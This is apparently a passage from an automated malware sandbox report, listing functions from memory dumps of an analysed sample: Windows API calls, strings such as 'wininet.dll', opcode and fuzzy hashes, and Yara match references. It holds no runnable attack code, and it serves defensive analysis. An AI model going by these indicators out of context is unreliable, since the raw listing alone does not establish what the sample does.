                                                                                        • API String ID: 823142352-1441809116
                                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                        • Instruction ID: 8d5d2a02fff64b2c8bfbe8d84dfccc8dd20026de004411d28e01eb37b2caff17
                                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                        • Instruction Fuzzy Hash: 3EF0B6B2200208ABCB08CF88DC85DEB77ADAF8C754F158248FA0D97241C630E811CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000D82F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtClose.NTDLL(0=,?,?,000D3D30,00000000,FFFFFFFF), ref: 000D8315
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID: 0=
                                                                                        • API String ID: 3535843008-3480422529
                                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                        • Instruction ID: 8a2de22ac62212a321528d150a748bf6b49eeecd8c018c29a0c065f9874f3435
                                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                        • Instruction Fuzzy Hash: A6D01776200314ABD710EF98CC85EE77BADEF48760F158499BA189B282C930FA0087E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000D8270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,000D3A11,?,?,?,?,000D3A11,FFFFFFFF,?,R=,?,00000000), ref: 000D82B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                        • Instruction ID: 5d4bbeb23d6cb19e3cc0a62c51b11b6aa16a238382542759e52415da46e8321b
                                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                        • Instruction Fuzzy Hash: EFF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E811CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F400C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F407AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F3F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F3F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F3FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F3FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F3FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                        • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F3FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F3FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F3FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F3FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F3FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F3FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000D6EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 000D6F88
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: net.dll$wininet.dll
                                                                                        • API String ID: 3472027048-1269752229
                                                                                        • Opcode ID: 67a4a9e2470e1a9eb71d61e32c209f2cf4580ac74f7fe013d62141b1f095f969
                                                                                        • Instruction ID: ce7ba1bf3d7df5c0db15eb92328071c8446537ffdba2ffd3ac27208dfdb0b35b
                                                                                        • Opcode Fuzzy Hash: 67a4a9e2470e1a9eb71d61e32c209f2cf4580ac74f7fe013d62141b1f095f969
                                                                                        • Instruction Fuzzy Hash: 30318FB1601704ABD711DF64D8A1FABB7F8EB88700F00842EF61A6B241D771A545CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000D84C2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3B93), ref: 000D84FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        • Opcode ID: 1e1c56cc498d2b081efa41b719de5a885c1b8f2a4df970407c214c56ecc1b6e4
                                                                                        • Instruction ID: 23e759d2e0ed5745651eb16abbdaf7f591522049179e173c5d0852d221d383fb
                                                                                        • Opcode Fuzzy Hash: 1e1c56cc498d2b081efa41b719de5a885c1b8f2a4df970407c214c56ecc1b6e4
                                                                                        • Instruction Fuzzy Hash: 4CE06DB2204315ABEB14EF58CC45FD77BA9EF88360F104599F9495B382D631E900CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000D84D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3B93), ref: 000D84FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                        • Instruction ID: 7585ac6d11bbf901d203a70ba40d131a7fa62268e1e15016412ae112b853ba42
                                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                        • Instruction Fuzzy Hash: C9E01AB12002046BD714DF59CC45EA777ADAF88750F018555F90857282CA30E910CAB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000C7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C72BA
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C72DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                        • Instruction ID: 4845e0e0065942b7b0c8f91c45a9e3ec08c7419178777d2af05e42f40061b8b7
                                                                                        • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                        • Instruction Fuzzy Hash: 3901D631A8032877E720A7949C03FFEB76C9B40B51F150119FF04BA2C2E6946A0687F6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000C9B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000C9B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
